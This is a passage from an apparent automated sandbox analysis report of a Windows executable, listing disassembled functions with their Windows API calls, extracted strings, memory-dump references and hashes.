                                                          • Instruction Fuzzy Hash: 49A001D7AAA193BC310862A26E07E3B221DC4C5B65335992EF81AC54C1A898586639B2
                                                          Function 00FCE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 8092bd38ab029cca13802555277957c2abc98036adfc6992ea9af9b6a23e44ef
                                                          • Instruction ID: 8bf781e30623f1e4a38c1a1280325b053e6fb5b58af4fbc18e161945e7b5ca29
                                                          • Opcode Fuzzy Hash: 8092bd38ab029cca13802555277957c2abc98036adfc6992ea9af9b6a23e44ef
                                                          • Instruction Fuzzy Hash: 20A011C3AAA0823C300822A22E03E3B220CC0C0B223308A2EF808C00C0A888082238B2
                                                          Function 00FCE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 0997adc5182ff54fff4ea101883129ec65475fc81e3b45b11071629cf3c39e17
                                                          • Instruction ID: 5a2cf529e0a86084103098aac997aa719d0563dc5ccae971783dd3629117791a
                                                          • Opcode Fuzzy Hash: 0997adc5182ff54fff4ea101883129ec65475fc81e3b45b11071629cf3c39e17
                                                          • Instruction Fuzzy Hash: D9A001D6AAA683BC310862566E07E3B261DC4C6F65374992EF85AC44C5A8845C4638B2
                                                          Function 00FCE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: f877351d69445d6ac29b02dc757040f69f79332193b6bd7ca2d49c7d2c2e3c6d
                                                          • Instruction ID: 5a2cf529e0a86084103098aac997aa719d0563dc5ccae971783dd3629117791a
                                                          • Opcode Fuzzy Hash: f877351d69445d6ac29b02dc757040f69f79332193b6bd7ca2d49c7d2c2e3c6d
                                                          • Instruction Fuzzy Hash: D9A001D6AAA683BC310862566E07E3B261DC4C6F65374992EF85AC44C5A8845C4638B2
                                                          Function 00FCE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: d6b8e1135046298bdbfbfba8201e8bd7168aeeb7d53d59effee44c12112a8423
                                                          • Instruction ID: 5a2cf529e0a86084103098aac997aa719d0563dc5ccae971783dd3629117791a
                                                          • Opcode Fuzzy Hash: d6b8e1135046298bdbfbfba8201e8bd7168aeeb7d53d59effee44c12112a8423
                                                          • Instruction Fuzzy Hash: D9A001D6AAA683BC310862566E07E3B261DC4C6F65374992EF85AC44C5A8845C4638B2
                                                          Function 00FCE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: c01301608cfb3b2a87270a7d5945907d20677b9ee8c37ac1865b27e265f3cb4e
                                                          • Instruction ID: 5a2cf529e0a86084103098aac997aa719d0563dc5ccae971783dd3629117791a
                                                          • Opcode Fuzzy Hash: c01301608cfb3b2a87270a7d5945907d20677b9ee8c37ac1865b27e265f3cb4e
                                                          • Instruction Fuzzy Hash: D9A001D6AAA683BC310862566E07E3B261DC4C6F65374992EF85AC44C5A8845C4638B2
                                                          Function 00FB9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEndOfFile.KERNELBASE(?,00FB903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00FB9F0C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: File
                                                          • String ID:
                                                          • API String ID: 749574446-0
                                                          • Opcode ID: 666fedcc926c0d8b032b2ef15f5bae836154f23009ec9929de31187e0a325e6b
                                                          • Instruction ID: f9a71353e2c945b054b526956a0b578cb62e3648b97ed2c275c75c2282a17f39
                                                          • Opcode Fuzzy Hash: 666fedcc926c0d8b032b2ef15f5bae836154f23009ec9929de31187e0a325e6b
                                                          • Instruction Fuzzy Hash: DAA0223008000E8BCE202B30CE0C00C3B20FB20BC830002E8A00BCF0B2CB238A0BEB00
                                                          Function 00FCAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetCurrentDirectoryW.KERNELBASE(?,00FCAE72,C:\Users\user\Desktop,00000000,00FF946A,00000006), ref: 00FCAC08
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory
                                                          • String ID:
                                                          • API String ID: 1611563598-0
                                                          • Opcode ID: 18a629172da62f0e717b0ee5df2cda1c8cfd923a9ed59adf122877906368dda5
                                                          • Instruction ID: be0a6816d3479df58e85d52bd15e6dd8ab46523377baa1de96c86a6f90b77321
                                                          • Opcode Fuzzy Hash: 18a629172da62f0e717b0ee5df2cda1c8cfd923a9ed59adf122877906368dda5
                                                          • Instruction Fuzzy Hash: 83A011302002808B82000B328F8EA0EBAAAAFA2B00F02C038A00088030CB38C820BA00

                                                          Non-executed Functions

                                                          Function 00FCC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00FCC2B1
                                                          • EndDialog.USER32(?,00000006), ref: 00FCC2C4
                                                          • GetDlgItem.USER32(?,0000006C), ref: 00FCC2E0
                                                          • SetFocus.USER32(00000000), ref: 00FCC2E7
                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 00FCC321
                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00FCC358
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00FCC36E
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FCC38C
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FCC39C
                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FCC3B8
                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FCC3D4
                                                          • _swprintf.LIBCMT ref: 00FCC404
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00FCC417
                                                          • FindClose.KERNEL32(00000000), ref: 00FCC41E
                                                          • _swprintf.LIBCMT ref: 00FCC477
                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 00FCC48A
                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00FCC4A7
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00FCC4C7
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FCC4D7
                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FCC4F1
                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FCC509
                                                          • _swprintf.LIBCMT ref: 00FCC535
                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00FCC548
                                                          • _swprintf.LIBCMT ref: 00FCC59C
                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 00FCC5AF
                                                            • Part of subcall function 00FCAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FCAF35
                                                            • Part of subcall function 00FCAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00FEE72C,?,?), ref: 00FCAF84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                          • API String ID: 797121971-1840816070
                                                          • Opcode ID: bf2ebf9b76b563b58d5eab267e0476b1f668602653708e4b82a2499972929c54
                                                          • Instruction ID: 436cb7446f2f3d03dacae2deeba528f7e6b4e6fb8565517f9b9a7add5605c65a
                                                          • Opcode Fuzzy Hash: bf2ebf9b76b563b58d5eab267e0476b1f668602653708e4b82a2499972929c54
                                                          • Instruction Fuzzy Hash: 5E91A472548349BBE231DBA0CD4AFFB77ACEB49710F04481DF789D6081D779A604AB62
                                                          Function 00FB6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB6FAA
                                                          • _wcslen.LIBCMT ref: 00FB7013
                                                          • _wcslen.LIBCMT ref: 00FB7084
                                                            • Part of subcall function 00FB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FB7AAB
                                                            • Part of subcall function 00FB7A9C: GetLastError.KERNEL32 ref: 00FB7AF1
                                                            • Part of subcall function 00FB7A9C: CloseHandle.KERNEL32(?), ref: 00FB7B00
                                                            • Part of subcall function 00FBA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00FB977F,?,?,00FB95CF,?,?,?,?,?,00FE2641,000000FF), ref: 00FBA1F1
                                                            • Part of subcall function 00FBA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FB977F,?,?,00FB95CF,?,?,?,?,?,00FE2641), ref: 00FBA21F
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00FB7139
                                                          • CloseHandle.KERNEL32(00000000), ref: 00FB7155
                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00FB7298
                                                            • Part of subcall function 00FB9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FB73BC,?,?,?,00000000), ref: 00FB9DBC
                                                            • Part of subcall function 00FB9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00FB9E70
                                                            • Part of subcall function 00FB9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00FB95D6,?,?,?,?,?,00FE2641,000000FF), ref: 00FB963B
                                                            • Part of subcall function 00FBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA501
                                                            • Part of subcall function 00FBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA532
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                          • API String ID: 2821348736-3508440684
                                                          • Opcode ID: 5bdf6ed50c781326e6cc63bba3b6c0f4bd7cc1f4c8f8127038de6775c470621c
                                                          • Instruction ID: a92d33f7f566c6031b1ff933b895ffa4155b093b1c2d848ceab2515a619aeb51
                                                          • Opcode Fuzzy Hash: 5bdf6ed50c781326e6cc63bba3b6c0f4bd7cc1f4c8f8127038de6775c470621c
                                                          • Instruction Fuzzy Hash: 19C11971D04344AADB20EB75CC85FEEB7ACAF44300F04455AFA56E7282D738AA44EF61
                                                          Function 00FDD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          • Opcode ID: 1d6e9d614fb92ecec9379a0499a328762733953f5f53faa29d441bbeea55995f
                                                          • Instruction ID: 0b83e23e04fe1f24c9780727d4c9dc7c4d2a2636233187f5ea997dcce7058500
                                                          • Opcode Fuzzy Hash: 1d6e9d614fb92ecec9379a0499a328762733953f5f53faa29d441bbeea55995f
                                                          • Instruction Fuzzy Hash: 02C23972E046288FDB25DE289D407E9B7B6EB44314F1941EBD44DEB340E779AE81AF40
                                                          Function 00FB32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog_swprintf
                                                          • String ID: CMT$h%u$hc%u
                                                          • API String ID: 146138363-3282847064
                                                          • Opcode ID: 54d470bf459f8dc3d18f9b7bf4cfd2cebb2083e1e714d237528b2a6c817ca049
                                                          • Instruction ID: 4b41a289ebaff2ffb51a248aefe93e644765d8e5ab8f388ff6d42b7a03e6a299
                                                          • Opcode Fuzzy Hash: 54d470bf459f8dc3d18f9b7bf4cfd2cebb2083e1e714d237528b2a6c817ca049
                                                          • Instruction Fuzzy Hash: 3F32F471550284AFDF14DF75CC96AEA3BA5AF54300F08447DFD8A8B282DB74AA48DF60
                                                          Function 00FB286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB2874
                                                          • _strlen.LIBCMT ref: 00FB2E3F
                                                            • Part of subcall function 00FC02BA: __EH_prolog.LIBCMT ref: 00FC02BF
                                                            • Part of subcall function 00FC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FBBAE9,00000000,?,?,?,00010444), ref: 00FC1BA0
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB2F91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                          • String ID: CMT
                                                          • API String ID: 1206968400-2756464174
                                                          • Opcode ID: 1a3cf731c754d5d20c963ebb97a1fd1bdfdd841d830afd27466904ca981c5220
                                                          • Instruction ID: 3a05db2265a60db53b7bdac6c9e42bb3fe2e4fede37d931180ca217823bab304
                                                          • Opcode Fuzzy Hash: 1a3cf731c754d5d20c963ebb97a1fd1bdfdd841d830afd27466904ca981c5220
                                                          • Instruction Fuzzy Hash: D6621871A002458FDB19DF35C8867EA3BA1FF54310F08857EEC9A8B282DB759945EF60
                                                          Function 00FCF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FCF844
                                                          • IsDebuggerPresent.KERNEL32 ref: 00FCF910
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FCF930
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00FCF93A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                          • String ID:
                                                          • API String ID: 254469556-0
                                                          • Opcode ID: b6fbf6ad6b779220726939c381c11bd7b2b90c0a7071026aa5db11f7b3d3195e
